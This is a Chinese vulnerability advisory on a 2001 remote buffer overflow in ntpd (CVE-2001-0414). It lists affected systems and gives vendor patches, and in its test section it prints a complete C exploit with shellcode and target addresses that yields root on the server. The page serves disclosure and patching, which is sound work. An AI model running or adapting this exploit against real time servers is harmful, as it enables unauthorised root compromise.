首页 -> 安全研究
安全研究
安全漏洞
Ntpd远程缓冲区溢出漏洞
发布日期:2001-04-04
更新日期:2002-05-08
受影响系统:
Apple MacOS X 10.0.1不受影响系统:
Apple MacOS X 10.0
Cisco IOS 12.2XQ
Cisco IOS 12.2XH
Cisco IOS 12.2XE
Cisco IOS 12.2XD
Cisco IOS 12.2XA
Cisco IOS 12.2T
Cisco IOS 12.1YF
Cisco IOS 12.1YE
Cisco IOS 12.1YD
Cisco IOS 12.1YC
Cisco IOS 12.1YB
Cisco IOS 12.1YA
Cisco IOS 12.1XZ
Cisco IOS 12.1XY
Cisco IOS 12.1XX
Cisco IOS 12.1XW
Cisco IOS 12.1XV
Cisco IOS 12.1XU
Cisco IOS 12.1XT
Cisco IOS 12.1XS
Cisco IOS 12.1XR
Cisco IOS 12.1XQ
Cisco IOS 12.1XP
Cisco IOS 12.1XM
Cisco IOS 12.1XL
Cisco IOS 12.1XK
Cisco IOS 12.1XJ
Cisco IOS 12.1XI
Cisco IOS 12.1XH
Cisco IOS 12.1XG
Cisco IOS 12.1XF
Cisco IOS 12.1XE
Cisco IOS 12.1XD
Cisco IOS 12.1XC
Cisco IOS 12.1XB
Cisco IOS 12.1XA
Cisco IOS 12.1T
Cisco IOS 12.1EZ
Cisco IOS 12.1EY
Cisco IOS 12.1EX
Cisco IOS 12.1EC
Cisco IOS 12.1EA
Cisco IOS 12.1E
Cisco IOS 12.1DC
Cisco IOS 12.1DB
Cisco IOS 12.1DA
Cisco IOS 12.1CX
Cisco IOS 12.1AA
Cisco IOS 12.0XV
Cisco IOS 12.0XU
Cisco IOS 12.0XS
Cisco IOS 12.0XR
Cisco IOS 12.0XQ
Cisco IOS 12.0XP
Cisco IOS 12.0XN
Cisco IOS 12.0XM
Cisco IOS 12.0XL
Cisco IOS 12.0XK
Cisco IOS 12.0XJ
Cisco IOS 12.0XI
Cisco IOS 12.0XH
Cisco IOS 12.0XG
Cisco IOS 12.0XF
Cisco IOS 12.0XE
Cisco IOS 12.0XD
Cisco IOS 12.0XC
Cisco IOS 12.0XB
Cisco IOS 12.0XA
Cisco IOS 12.0WT
Cisco IOS 12.0WC
Cisco IOS 12.0W5
Cisco IOS 12.0T
Cisco IOS 12.0SX
Cisco IOS 12.0ST
Cisco IOS 12.0SP
Cisco IOS 12.0SL
Cisco IOS 12.0SC
Cisco IOS 12.0S
Cisco IOS 12.0DC
Cisco IOS 12.0DB
Cisco IOS 12.0DA
Cisco IOS 12.0
Cisco IOS 11.3XA
Cisco IOS 11.3WA4
Cisco IOS 11.3T
Cisco IOS 11.3NA
Cisco IOS 11.3MA
Cisco IOS 11.3HA
Cisco IOS 11.3DB
Cisco IOS 11.3DA
Cisco IOS 11.3AA
Cisco IOS 11.3
Cisco IOS 11.2
Cisco IOS 11.1IA
Cisco IOS 11.1CT
Cisco IOS 11.1CC
Cisco IOS 11.1CA
Cisco IOS 11.1AA
Cisco IOS 11.1
Cisco IOS 11.0
Cisco IOS 10.3
Dave Mills ntpd 4.0.99j
Dave Mills ntpd 4.0.99i
Dave Mills ntpd 4.0.99h
Dave Mills ntpd 4.0.99g
Dave Mills ntpd 4.0.99f
Dave Mills ntpd 4.0.99e
Dave Mills ntpd 4.0.99d
Dave Mills ntpd 4.0.99c
Dave Mills ntpd 4.0.99b
Dave Mills ntpd 4.0.99a
Dave Mills ntpd 4.0.99
HP HP-UX 11.11
HP HP-UX 11.0
HP HP-UX 10.20
HP HP-UX 10.10
HP HP-UX 10.01
Sun Solaris 8.0_x86
Sun Solaris 8.0
Sun Solaris 7.0_x86
Sun Solaris 7.0
Sun Solaris 2.6_x86
Sun Solaris 2.6
Dave Mills ntpd 4.0.99k
- Debian Linux 2.2
- FreeBSD 4.2-RELEASE
- Mandrake Linux Corporate Server 1.0.1
- Mandrake Linux 7.2
- Mandrake Linux 7.1
- RedHat Linux 7.0
- Slackware Linux 7.0
Apple MacOS X 10.0.2描述:
Cisco IOS 12.1(8a)E
Cisco IOS 12.1(6)EY
Cisco IOS 12.1(5)YF2
Cisco IOS 12.1(5)YD2
Cisco IOS 12.1(5)YC1
BUGTRAQ ID: 2540
CVE(CAN) ID: CVE-2001-0414
多种Unix/Linux操作系统和Cisco路由器的网络时间协议守护进程(NTPD)容易遭受远程缓冲区溢出攻击。
由于NTP基于无状态的UDP协议,于是可以伪造各种恶意的请求报文,引发远程缓冲区溢出。绝大多数情况下,NTPD是以root身份启动的,所以远程缓冲区溢出后将直接获取root权限。
尽管这次是常规缓冲区溢出,但为了有效利用它进行攻击还是相当困难的。目标缓冲区会因为某些原因被破坏,攻击完成时,shellcode真正可利用的缓冲区将小于70字节。下面的演示代码简单执行了/tmp/sh而已,完全可以构造一次完整的远程攻击。
<*来源:Przemyslaw Frasunek (venglin@freebsd.lublin.pl)
链接:http://online.securityfocus.com/archive/1/174069
http://online.securityfocus.com/archive/1/174011
ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2001-004.txt.asc
http://www.linux-mandrake.com/en/security/2001/MDKSA-2001-036.php3
http://www.debian.org/security/2001/dsa-045
http://online.securityfocus.com/advisories/3262
http://cert.uni-stuttgart.de/archive/win-sec-ssc/2001/07/msg00003.html
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/211&type=0&nav=sec.sba
http://www.cisco.com/warp/public/707/NTP-pub.shtml
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/* ntpd remote root exploit / babcia padlina ltd. <venglin@freebsd.lublin.pl> */
/*
* Network Time Protocol Daemon (ntpd) shipped with many systems is vulnerable
* to remote buffer overflow attack. It occurs when building response for
* a query with large readvar argument. In almost all cases, ntpd is running
* with superuser privileges, allowing to gain REMOTE ROOT ACCESS to timeserver.
*
* Althought it's a normal buffer overflow, exploiting it is much harder.
* Destination buffer is accidentally damaged, when attack is performed, so
* shellcode can't be larger than approx. 70 bytes. This proof of concept code
* uses small execve() shellcode to run /tmp/sh binary. Full remote attack
* is possible.
*
* NTP is stateless UDP based protocol, so all malicious queries can be
* spoofed.
*
* Example of use on generic RedHat 7.0 box:
*
* [venglin@cipsko venglin]$ cat dupa.c
* main() { setreuid(0,0); system("chmod 4755 /bin/sh"); }
* [venglin@cipsko venglin]$ cc -o /tmp/sh dupa.c
* [venglin@cipsko venglin]$ cc -o ntpdx ntpdx.c
* [venglin@cipsko venglin]$ ./ntpdx -t2 localhost
* ntpdx v1.0 by venglin@freebsd.lublin.pl
*
* Selected platform: RedHat Linux 7.0 with ntpd 4.0.99k-RPM (/tmp/sh)
*
* RET: 0xbffff777 / Align: 240 / Sh-align: 160 / sending query
* [1] <- evil query (pkt = 512 | shell = 45)
* [2] <- null query (pkt = 12)
* Done.
* /tmp/sh was spawned.
* [venglin@cipsko venglin]$ ls -al /bin/bash
* -rwsr-xr-x 1 root root 512540 Aug 22 2000 /bin/bash
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>
#include <arpa/inet.h>
#define NOP 0x90
#define ADDRS 8
#define PKTSIZ 512
static char usage[] = "usage: ntpdx [-o offset] <-t type> <hostname>";
/* generic execve() shellcodes */
char lin_execve[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/tmp/sh";
char bsd_execve[] =
"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/tmp/sh\x01\x01\x01\x01"
"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
struct platforms
{
char *os;
char *version;
char *code;
long ret;
int align;
int shalign;
int port;
};
/* Platforms. Notice, that on FreeBSD shellcode must be placed in packet
* *after* RET address. This values will vary from platform to platform.
*/
struct platforms targ[] =
{
{ "FreeBSD 4.2-STABLE", "4.0.99k (/tmp/sh)", bsd_execve,
0xbfbff8bc, 200, 220, 0 },
{ "FreeBSD 4.2-STABLE", "4.0.99k (/tmp/sh)", bsd_execve,
0xbfbff540, 200, 220, 0 },
{ "RedHat Linux 7.0", "4.0.99k-RPM (/tmp/sh)", lin_execve,
0xbffff777, 240, 160, 0 },
{ NULL, NULL, NULL, 0x0, 0, 0, 0 }
};
long getip(name)
char *name;
{
struct hostent *hp;
long ip;
extern int h_errno;
if ((ip = inet_addr(name)) < 0)
{
if (!(hp = gethostbyname(name)))
{
fprintf(stderr, "gethostbyname(): %s\n",
strerror(h_errno));
exit(1);
}
memcpy(&ip, (hp->h_addr), 4);
}
return ip;
}
int doquery(host, ret, shellcode, align, shalign)
char *host, *shellcode;
long ret;
int align, shalign;
{
/* tcpdump-based reverse engineering :)) */
char q2[] = { 0x16, 0x02, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x01, 0x36, 0x73, 0x74, 0x72, 0x61,
0x74, 0x75, 0x6d, 0x3d };
char q3[] = { 0x16, 0x02, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00 };
char buf[PKTSIZ], *p;
long *ap;
int i;
int sockfd;
struct sockaddr_in sa;
bzero(&sa, sizeof(sa));
sa.sin_family = AF_INET;
sa.sin_port = htons(123);
sa.sin_addr.s_addr = getip(host);
if((sockfd = socket(AF_INET, SOCK_DGRAM, 0)) < 0)
{
perror("socket");
return -1;
}
if((connect(sockfd, (struct sockaddr *)&sa, sizeof(sa))) < 0)
{
perror("connect");
close(sockfd);
return -1;
}
memset(buf, NOP, PKTSIZ);
memcpy(buf, q2, sizeof(q2));
p = buf + align;
ap = (unsigned long *)p;
for(i=0;i<ADDRS/4;i++)
*ap++ = ret;
p = (char *)ap;
memcpy(buf+shalign, shellcode, strlen(shellcode));
if((write(sockfd, buf, PKTSIZ)) < 0)
{
perror("write");
close(sockfd);
return -1;
}
fprintf(stderr, "[1] <- evil query (pkt = %d | shell = %d)\n", PKTSIZ,
strlen(shellcode));
fflush(stderr);
if ((write(sockfd, q3, sizeof(q3))) < 0)
{
perror("write");
close(sockfd);
return -1;
}
fprintf(stderr, "[2] <- null query (pkt = %d)\n", sizeof(q3));
fflush(stderr);
close(sockfd);
return 0;
}
int main(argc, argv)
int argc;
char **argv;
{
extern int optind, opterr;
extern char *optarg;
int ch, type, ofs, i;
long ret;
opterr = ofs = 0;
type = -1;
while ((ch = getopt(argc, argv, "t:o:")) != -1)
switch((char)ch)
{
case 't':
type = atoi(optarg);
break;
case 'o':
ofs = atoi(optarg);
break;
case '?':
default:
puts(usage);
exit(0);
}
argc -= optind;
argv += optind;
fprintf(stderr, "ntpdx v1.0 by venglin@freebsd.lublin.pl\n\n");
if (type < 0)
{
fprintf(stderr, "Please select platform:\n");
for (i=0;targ[i].os;i++)
{
fprintf(stderr, "\t-t %d : %s %s (%p)\n", i,
targ[i].os, targ[i].version, (void *)targ[i].ret);
}
exit(0);
}
fprintf(stderr, "Selected platform: %s with ntpd %s\n\n",
targ[type].os, targ[type].version);
ret = targ[type].ret;
ret += ofs;
if (argc != 1)
{
puts(usage);
exit(0);
}
fprintf(stderr, "RET: %p / Align: %d / Sh-align: %d / sending query\n",
(void *)ret, targ[type].align, targ[type].shalign);
if (doquery(*argv, ret, targ[type].code, targ[type].align,
targ[type].shalign) < 0)
{
fprintf(stderr, "Failed.\n");
exit(1);
}
fprintf(stderr, "Done.\n");
if (!targ[type].port)
{
fprintf(stderr, "/tmp/sh was spawned.\n");
exit(0);
}
exit(0);
}
建议:
厂商补丁:
Cisco
-----
Cisco已经为此发布了一个安全公告(Cisco-NTP)以及相应补丁:
Cisco-NTP:Cisco Security Advisory: NTP Vulnerability
链接:http://www.cisco.com/warp/public/707/NTP-pub.shtml
补丁下载:
Cisco IOS 10.3:
Cisco IOS 11.0:
Cisco Upgrade IOS 12.0(18)
Cisco IOS 11.1 IA:
Cisco Upgrade IOS 12.2(3)
Cisco IOS 11.1 CT:
Cisco Upgrade IOS 12.0ST
Cisco IOS 11.1 CC:
Cisco Upgrade IOS 11.1(36)CC2
Cisco IOS 11.1 CA:
Cisco IOS 11.1 AA:
Cisco Upgrade IOS 12.1(9)
Cisco IOS 11.1:
Cisco Upgrade IOS 12.0(18)
Cisco IOS 11.2 XA:
Cisco Upgrade IOS 12.0(18)
Cisco IOS 11.2 WA4:
Cisco Upgrade IOS 12.0W
Cisco IOS 11.2 SA:
Cisco Upgrade IOS 12.0W
Cisco IOS 11.2 P:
Cisco Upgrade IOS 12.0(18)
Cisco IOS 11.2 GS:
Cisco Upgrade IOS 12.0(18)
Cisco IOS 11.2 F:
Cisco Upgrade IOS 12.0(18)
Cisco IOS 11.2 BC:
Cisco Upgrade IOS 12.1(9)
Cisco IOS 11.2:
Cisco Upgrade IOS 11.2(26a)
Cisco IOS 11.3 XA:
Cisco Upgrade IOS 12.0(18)
Cisco IOS 11.3 WA4:
Cisco Upgrade IOS 12.0WA
Cisco IOS 11.3 T:
Cisco Upgrade IOS 12.0(18)
Cisco IOS 11.3 NA:
Cisco Upgrade IOS 12.1(9)
Cisco IOS 11.3 MA:
Cisco Upgrade IOS 12.1(9)
Cisco IOS 11.3 HA:
Cisco Upgrade IOS 12.0(18)
Cisco IOS 11.3 DB:
Cisco Upgrade IOS 12.1DB
Cisco IOS 11.3 DA:
Cisco Upgrade IOS 12.1DA
Cisco IOS 11.3 AA:
Cisco Upgrade IOS 12.1(9)
Cisco IOS 11.3:
Cisco Upgrade IOS 12.0(18)
Cisco IOS 12.0 XV:
Cisco Upgrade IOS 12.2(4)
Cisco IOS 12.0 XU:
Cisco Upgrade IOS 12.0WC
Cisco IOS 12.0 XS:
Cisco Upgrade IOS 12.1(8a)E
Cisco IOS 12.0 XR:
Cisco Upgrade IOS 12.2(3)
Cisco Upgrade IOS 12.2(1b)
Cisco IOS 12.0 XQ:
Cisco Upgrade IOS 12.1(9)
Cisco IOS 12.0 XP:
Cisco Upgrade IOS 12.0WC
Cisco IOS 12.0 XN:
Cisco Upgrade IOS 12.1(9)
Cisco IOS 12.0 XM:
Cisco Upgrade IOS 12.0(5)YB4
Cisco IOS 12.0 XL:
Cisco Upgrade IOS 12.1(9)
Cisco IOS 12.0 XJ:
Cisco Upgrade IOS 12.1(9)
Cisco IOS 12.0 XI:
Cisco Upgrade IOS 12.1(9)
Cisco IOS 12.0 XH:
Cisco Upgrade IOS 12.1(9)
Cisco IOS 12.0 XG:
Cisco Upgrade IOS 12.1(9)
Cisco IOS 12.0 XF:
Cisco Upgrade IOS 12.1(9)
Cisco IOS 12.0 XE:
Cisco Upgrade IOS 12.1(8a)E
Cisco IOS 12.0 XD:
Cisco Upgrade IOS 12.1(9)
Cisco IOS 12.0 XC:
Cisco Upgrade IOS 12.1(9)
Cisco IOS 12.0 XB:
Cisco Upgrade IOS 12.1(9)
Cisco IOS 12.0 XA:
Cisco Upgrade IOS 12.1(9)
Cisco IOS 12.0 WT:
Cisco IOS 12.0 WC:
Cisco Upgrade IOS 12.0(5)WC2
Cisco IOS 12.0 T:
Cisco Upgrade IOS 12.1(9)
Cisco IOS 12.0 ST:
Cisco Upgrade IOS 12.0(17)ST1
Cisco IOS 12.0 SL:
Cisco Upgrade IOS 12.0(17)SL2
Cisco Upgrade IOS 12.0ST
Cisco IOS 12.0 SC:
Cisco Upgrade IOS 12.0(16)SC
Cisco IOS 12.0 S:
Cisco Upgrade IOS 12.0(18)S
Cisco IOS 12.0 DC:
Cisco Upgrade IOS 12.1DC
Cisco IOS 12.0 DB:
Cisco Upgrade IOS 12.1(5)DB2
Cisco IOS 12.0 DA:
Cisco Upgrade IOS 12.1(7)DA2
Cisco IOS 12.0 (7)XK:
Cisco IOS 12.0 (5)XK:
Cisco IOS 12.0 (14)W5(20):
Cisco Upgrade IOS 12.0(18)W5(22)
Cisco IOS 12.0 (13)W5(19c):
Cisco Upgrade IOS 12.0(16)W5(21)
Cisco IOS 12.0 (10)W5(18g):
Cisco Upgrade IOS 12.0(18)W5(22a)
Cisco IOS 12.0:
Cisco Upgrade IOS 12.0(18)
Cisco IOS 12.1 YF:
Cisco Upgrade IOS 12.1(5)YF2
Cisco IOS 12.1 YD:
Cisco Upgrade IOS 12.1(5)YD2
Cisco IOS 12.1 YC:
Cisco Upgrade IOS 12.1(5)YC1
Cisco IOS 12.1 YB:
Cisco Upgrade IOS 12.1(5)YB4
Cisco IOS 12.1 YA:
Cisco IOS 12.1 XZ:
Cisco IOS 12.1 XY:
Cisco IOS 12.1 XX:
Cisco IOS 12.1 XW:
Cisco Upgrade IOS 12.2DD
Cisco IOS 12.1 XV:
Cisco Upgrade IOS 12.1(5)XV3
Cisco IOS 12.1 XU:
Cisco Upgrade IOS 12.2(2)XA
Cisco IOS 12.1 XT:
Cisco Upgrade IOS 12.1(5)YB4
Cisco IOS 12.1 XS:
Cisco Upgrade IOS 12.1(5)XS2
Cisco IOS 12.1 XR:
Cisco Upgrade IOS 12.1(5)YD2
Cisco IOS 12.1 XQ:
Cisco Upgrade IOS 12.2(1b)
Cisco IOS 12.1 XP:
Cisco Upgrade IOS 12.1(5)YB4
Cisco IOS 12.1 XM:
Cisco Upgrade IOS 12.1(5)XM4
Cisco IOS 12.1 XL:
Cisco Upgrade IOS 12.2(3)
Cisco Upgrade IOS 12.2(1b)
Cisco IOS 12.1 XK:
Cisco IOS 12.1 XJ:
Cisco Upgrade IOS 12.1(5)YB4
Cisco IOS 12.1 XI:
Cisco Upgrade IOS 12.2(3)
Cisco Upgrade IOS 12.2(1b)
Cisco IOS 12.1 XH:
Cisco Upgrade IOS 12.2(3)
Cisco Upgrade IOS 12.2(1b)
Cisco IOS 12.1 XG:
Cisco IOS 12.1 XF:
Cisco Upgrade IOS 12.1(2)XF4
Cisco IOS 12.1 XE:
Cisco IOS 12.1 XD:
Cisco Upgrade IOS 12.2(3)
Cisco Upgrade IOS 12.2(1b)
Cisco IOS 12.1 XC:
Cisco Upgrade IOS 12.2(3)
Cisco Upgrade IOS 12.2(1b)
Cisco IOS 12.1 XB:
Cisco IOS 12.1 XA:
Cisco Upgrade IOS 12.2(3)
Cisco Upgrade IOS 12.2(1b)
Cisco IOS 12.1 T:
Cisco Upgrade IOS 12.2(3)
Cisco Upgrade IOS 12.1(5)T9
Cisco Upgrade IOS 12.2(1b)
Cisco IOS 12.1 EZ:
Cisco Upgrade IOS 12.1(6)EZ2
Cisco IOS 12.1 EY:
Cisco Upgrade IOS 12.1(6)EY
Cisco IOS 12.1 EX:
Cisco Upgrade IOS 12.1(8a)E
Cisco IOS 12.1 EC:
Cisco Upgrade IOS 12.1(7)EC
Cisco IOS 12.1 E:
Cisco Upgrade IOS 12.1(8a)E
Cisco IOS 12.1 DC:
Cisco Upgrade IOS 12.2(2)B
Cisco IOS 12.1 DB:
Cisco Upgrade IOS 12.2(2)B
Cisco IOS 12.1 DA:
Cisco Upgrade IOS 12.1(7)DA2
Cisco IOS 12.1 CX:
Cisco Upgrade IOS 12.1(7)CX
Cisco IOS 12.1 AA:
Cisco Upgrade IOS 12.1(9)AA
Cisco IOS 12.1:
Cisco Upgrade IOS 12.1(9)
Cisco IOS 12.2 XQ:
Cisco Upgrade IOS 12.2(1)XQ
Cisco IOS 12.2 XH:
Cisco Upgrade IOS 12.2(1)XH
Cisco IOS 12.2 XE:
Cisco Upgrade IOS 12.2(1)XE
Cisco IOS 12.2 XD:
Cisco Upgrade IOS 12.2(1)XD1
Cisco IOS 12.2 XA:
Cisco Upgrade IOS 12.2(2)XA1
Cisco Upgrade IOS 12.2(2)XA
Cisco IOS 12.2 T:
Cisco Upgrade IOS 12.2(4)T
Cisco IOS 12.2 S:
Cisco Upgrade IOS 12.2(1.4)S
Cisco IOS 12.2 PI:
Cisco Upgrade IOS 12.2(1.1)PI
Cisco IOS 12.2 PB:
Cisco Upgrade IOS 12.2(3.4)BP
Cisco IOS 12.2 B:
Cisco Upgrade IOS 12.2(2)B
Cisco IOS 12.2:
Cisco Upgrade IOS 12.2(3)
Cisco Upgrade IOS 12.2(1b)
Debian
------
Debian已经为此发布了一个安全公告(DSA-045-2)以及相应补丁:
DSA-045-2:ntp remote root exploit
链接:http://www.debian.org/security/2001/dsa-045
补丁下载:
Source archives:
http://security.debian.org/debian-security/dists/stable/updates/main/source/ntp_4.0.99g-2potato2.diff.gz
http://security.debian.org/debian-security/dists/stable/updates/main/source/ntp_4.0.99g-2potato2.dsc
http://security.debian.org/debian-security/dists/stable/updates/main/source/ntp_4.0.99g.orig.tar.gz
Architecture-independent files:
http://security.debian.org/debian-security/dists/stable/updates/main/binary-all/ntp-doc_4.0.99g-2potato2_all.deb
http://security.debian.org/debian-security/dists/stable/updates/main/binary-all/xntp3_4.0.99g-2potato2_all.deb
Alpha architecture:
http://security.debian.org/debian-security/dists/stable/updates/main/binary-alpha/ntp_4.0.99g-2potato2_alpha.deb
http://security.debian.org/debian-security/dists/stable/updates/main/binary-alpha/ntpdate_4.0.99g-2potato2_alpha.deb
ARM architecture:
http://security.debian.org/debian-security/dists/stable/updates/main/binary-arm/ntp_4.0.99g-2potato2_arm.deb
http://security.debian.org/debian-security/dists/stable/updates/main/binary-arm/ntpdate_4.0.99g-2potato2_arm.deb
Intel ia32 architecture:
http://security.debian.org/debian-security/dists/stable/updates/main/binary-i386/ntp_4.0.99g-2potato2_i386.deb
http://security.debian.org/debian-security/dists/stable/updates/main/binary-i386/ntpdate_4.0.99g-2potato2_i386.deb
Motorola 680x0 architecture:
http://security.debian.org/debian-security/dists/stable/updates/main/binary-m68k/ntp_4.0.99g-2potato2_m68k.deb
http://security.debian.org/debian-security/dists/stable/updates/main/binary-m68k/ntpdate_4.0.99g-2potato2_m68k.deb
PowerPC architecture:
http://security.debian.org/debian-security/dists/stable/updates/main/binary-powerpc/ntp_4.0.99g-2potato2_powerpc.deb
http://security.debian.org/debian-security/dists/stable/updates/main/binary-powerpc/ntpdate_4.0.99g-2potato2_powerpc.deb
Sun Sparc architecture:
http://security.debian.org/debian-security/dists/stable/updates/main/binary-sparc/ntp_4.0.99g-2potato2_sparc.deb
http://sec
补丁安装方法:
1. 手工安装补丁包:
首先,使用下面的命令来下载补丁软件:
# wget url (url是补丁下载链接地址)
然后,使用下面的命令来安装补丁:
# dpkg -i file.deb (file是相应的补丁名)
2. 使用apt-get自动安装补丁包:
首先,使用下面的命令更新内部数据库:
# apt-get update
然后,使用下面的命令安装更新软件包:
# apt-get upgrade
FreeBSD
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
FreeBSD Patch ntpd.patch
http://phk.freebsd.dk/patch/ntpd.patch
HP
--
HP已经为此发布了一个安全公告(HPSBUX0104-148)以及相应补丁:
HPSBUX0104-148:Sec. Vulnerability in xntpd(1M)
补丁下载:
HP HP-UX 10.0 1:
HP Patch PHNE_23717
HP HP-UX 10.10:
HP Patch PHNE_23717
HP HP-UX 10.20:
HP Patch PHNE_23717
HP HP-UX (VVOS) 10.24:
HP Patch PHNE_24076
HP HP-UX 11.0:
HP Patch PHNE_23697
HP HP-UX (VVOS) 11.0.4:
HP Patch PHNE_24077
HP HP-UX 11.11:
HP Patch PHNE_22722
IBM
---
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
IBM Hotfix Temporary Fix (binaries for AIX 4.3 and 5.1):
xntpd_efix.tar.Z
ftp://aix.software.ibm.com/aix/efixes/security/xntpd_efix.tar.Z
MandrakeSoft
------------
MandrakeSoft已经为此发布了一个安全公告(MDKSA-2001:036)以及相应补丁:
MDKSA-2001:036:ntp/xntp3
链接:http://www.linux-mandrake.com/en/security/2001/MDKSA-2001-036.php3
补丁下载:
Sun
---
Sun已经为此发布了一个安全公告(Sun-00211)以及相应补丁:
Sun-00211:xntpd
链接:http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/211&type=0&nav=sec.sba
补丁下载:
OS Version Patch ID
__________ _________
SunOS 5.8 109667-04
SunOS 5.8_x86 109668-04
SunOS 5.7 109409-04
SunOS 5.7_x86 109410-03
SunOS 5.6 107298-03
SunOS 5.6_x86 107299-03
您可以使用下列链接来下载相应补丁:
http://sunsolve.sun.com/pub-cgi/patchDownload.pl?target=<补丁ID>&method=h
例如,对于代号为111596-02的补丁,您可以使用下列链接:
http://sunsolve.sun.com/pub-cgi/patchDownload.pl?target=111596&method=h
补丁安装方法:
1. 首先用unzip或者uncompress命令将补丁包解压缩
2. 然后使用patchadd 命令安装补丁,例如:
# patchadd /var/spool/patch/104945-02
假设要安装的补丁号是104945-02, 解压之后的目录在:"/var/spool/patch/104945-02"
浏览次数:5715
严重程度:0(网友投票)
绿盟科技给您安全的保障